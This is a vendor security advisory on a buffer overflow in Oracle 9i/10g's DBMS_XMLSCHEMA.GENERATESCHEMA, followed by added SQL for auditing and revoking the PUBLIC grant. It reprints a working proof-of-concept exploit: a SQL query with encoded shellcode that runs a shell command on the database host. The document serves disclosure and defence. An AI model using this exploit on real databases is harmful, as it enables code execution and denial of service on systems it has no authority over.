Buffer Overflow in XDB DBMS_XMLSCHEMA in Oracle 9i and 10g Rel 1
Details

Oracle Database Server provides the DBMS_XMLSCHEMA package, which includes procedures to register and delete XML schemas. This package contains the public procedures GENERATESCHEMA and GENERATESCHEMAS, which are vulnerable to buffer overflow attacks. By default, EXECUTE permission on XDB.DBMS_XMLSCHEMA is granted to PUBLIC, so any Oracle database user can exploit this vulnerability. Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.

Example

Sample exploit from Argeniss for Oracle 10g Rel. 1 on Windows.

/*
Proof of concept exploit code

Oracle Database Buffer overflow vulnerability in public procedure DBMS_XMLSCHEMA.GENERATESCHEMA

http://www.argeniss.com/research.html
By Esteban Martinez Fayo

Oracle version: 10g Release 1
Platform: Windows

Shellcode creates file c:\Unbreakable.txt and writes "ARE YOU SURE?"
*/
SELECT XDB.DBMS_XMLSCHEMA.GENERATESCHEMA ('a', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDE' ||
chr(212)||chr(100)||chr(201)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)
||chr(192)||chr(146)||chr(49)||chr(02)||chr(255)||chr(21)||chr(156)||chr(217)||chr(49)||chr(2)||chr(32)
||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL;

Workaround

Revoke the PUBLIC privilege from DBMS_XMLSCHEMA.

Patch Information

Apply the Oracle Critical Patch Update from January 2006 or later.

© 2005 by Red-Database-Security GmbH - last update 27-jan-2006
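One way to apply and verify the workaround described above, as an added example that is not part of the original advisory. It uses the standard data dictionary views and assumes a DBA session in SQL*Plus; APP_XML_OWNER is a hypothetical account name.

```sql
-- Added example: audit, apply and verify the workaround. Run as a DBA.

-- 1. Who can currently execute the package? A row with GRANTEE = 'PUBLIC'
--    means every database account can reach GENERATESCHEMA(S).
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner = 'XDB'
   AND table_name = 'DBMS_XMLSCHEMA'
 ORDER BY grantee;

-- 2. Which stored code outside SYS/XDB references the package (directly or
--    through a public synonym) and may rely on the PUBLIC grant?
--    Callers that use dynamic SQL do not appear in this view.
SELECT d.owner, d.name, d.type
  FROM dba_dependencies d
 WHERE d.referenced_name = 'DBMS_XMLSCHEMA'
   AND d.referenced_owner IN ('XDB', 'PUBLIC')
   AND d.owner NOT IN ('SYS', 'XDB')
 ORDER BY d.owner, d.name;

-- 3. Apply the workaround.
REVOKE EXECUTE ON xdb.dbms_xmlschema FROM PUBLIC;

-- 4. Re-grant only to the accounts identified in step 2 that need it.
--    APP_XML_OWNER is a hypothetical name; replace it or skip this step.
-- GRANT EXECUTE ON xdb.dbms_xmlschema TO app_xml_owner;

-- 5. Verify: this must return no rows.
SELECT grantee
  FROM dba_tab_privs
 WHERE owner = 'XDB'
   AND table_name = 'DBMS_XMLSCHEMA'
   AND grantee = 'PUBLIC';

-- 6. List dependents of the package that are now invalid, so they can be
--    fixed with a direct grant (step 4) and recompiled.
SELECT o.owner, o.object_name, o.object_type
  FROM dba_objects o
  JOIN dba_dependencies d
    ON d.owner = o.owner
   AND d.name  = o.object_name
   AND d.type  = o.object_type
 WHERE o.status = 'INVALID'
   AND d.referenced_name = 'DBMS_XMLSCHEMA'
   AND d.referenced_owner IN ('XDB', 'PUBLIC')
 ORDER BY o.owner, o.object_name;
```

The revoke only narrows who can reach the vulnerable procedures; accounts that keep EXECUTE remain exposed until the January 2006 Critical Patch Update or later is applied.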